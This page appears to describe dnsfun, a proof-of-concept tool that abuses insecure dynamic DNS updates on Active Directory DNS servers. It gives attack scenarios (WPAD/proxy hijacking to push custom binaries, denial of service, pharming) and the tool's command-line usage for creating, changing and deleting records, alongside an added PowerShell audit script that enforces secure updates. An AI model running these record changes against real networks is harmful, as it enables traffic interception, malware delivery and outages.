By default, most Microsoft DNS servers integrated with Active Directory allow insecure dynamic updates of DNS records.
This feature allows remote users to create, change and delete DNS records by calling APIs such as DnsReplaceRecordSetA.
Dnsfun exploits that weak configuration and allows remote users to modify DNS records.
There are several attack scenarios:
+ MITM attacks: changing the DNS records for the network proxy/WPAD and relaying HTTP queries. This attack vector is the most reliable and also allows us to exploit automatic updates for most Windows software by deploying custom binaries to the client.
+ Denial of service: deleting or changing critical DNS records.
+ Pharming: like MITM attacks, poisoning several DNS records.
If the system is configured correctly, only the owner of a record is able to modify that DNS entry, but that does not prevent authenticated users from creating new DNS records.
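As an added, defender-side example that is not part of dnsfun or the original page, the following PowerShell audits AD-integrated primary zones for the weak "NonsecureAndSecure" dynamic-update setting described above and, with -Fix, switches them to Secure; the server name is an assumed placeholder.

```powershell
# Added example (not dnsfun code): audit the dynamic-update mode of
# AD-integrated zones and optionally enforce secure updates only.
# Requires the DnsServer module (RSAT) and admin rights on the DNS server.
param(
    [string]$Server = 'dns01.corp.example',   # assumed placeholder, replace
    [switch]$Fix
)
Import-Module DnsServer

# Only AD-integrated primary zones can use secure (Kerberos/GSS-TSIG) updates;
# auto-created zones (e.g. 0.in-addr.arpa) are skipped.
$zones = Get-DnsServerZone -ComputerName $Server |
    Where-Object { $_.IsDsIntegrated -and -not $_.IsAutoCreated -and $_.ZoneType -eq 'Primary' }

foreach ($z in $zones) {
    switch ($z.DynamicUpdate) {
        'NonsecureAndSecure' {
            # Weak setting: unauthenticated clients may add/replace/delete records.
            Write-Warning "$($z.ZoneName): accepts nonsecure dynamic updates"
            if ($Fix) {
                Set-DnsServerPrimaryZone -Name $z.ZoneName -ComputerName $Server -DynamicUpdate Secure
                Write-Output "$($z.ZoneName): dynamic updates set to Secure"
            }
        }
        'Secure' {
            # Only the record owner (the principal that created it) may change it;
            # authenticated users can still create new records in the zone.
            Write-Output "$($z.ZoneName): Secure"
        }
        'None' { Write-Output "$($z.ZoneName): dynamic updates disabled" }
    }
}
```

Run with -Fix only after confirming that all DHCP/DNS registration clients in the zone can perform secure updates, otherwise their registrations will start to fail.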
Microsoft Dynamic DNS Updates - Proof of Concept v1.1
http://www.tarasco.org - (c) 2007-2008 Andres Tarasco Acuña
dnsfun.exe -[s]d|c|q[u][x|y|z] [options]
dnsfun.exe -s ip (dns Server (optional))
dnsfun.exe -d fqdn (Delete dns record)
dnsfun.exe -q fqdn (Query dns record)
dnsfun.exe -c[a|c] ip (Create A or CName record (default A))
dnsfun.exe -x user (auth information. also use -y and -z)
dnsfun.exe -y pass (auth information. also use -x and -z)
dnsfun.exe -z domain (auth information. also use -x and -y)
dnsfun.exe -u ip|fqdn (Update dns record (requires -q or -c))
dnsfun.exe -s 10.0.0.1 -q proxy.mydomain.com -u 22.214.171.124 (Updates record)
dnsfun.exe -s 10.0.0.1 -d foo.mydomain.com (delete foo.mydomain.com record)
dnsfun.exe -s 10.0.0.1 -c atarasco.foo.mydomain.com -u 126.96.36.199 (creates record)
dnsfun.exe -s 10.0.0.1 -cc www.atarasco.foo.mydomain.com -u 188.8.131.52 (creates record)
dnsfun.exe -s 10.0.0.1 -q _ldap._tcp.mydomain (Query for srv record)
You can also browse the source code online
(Windows executable + source code)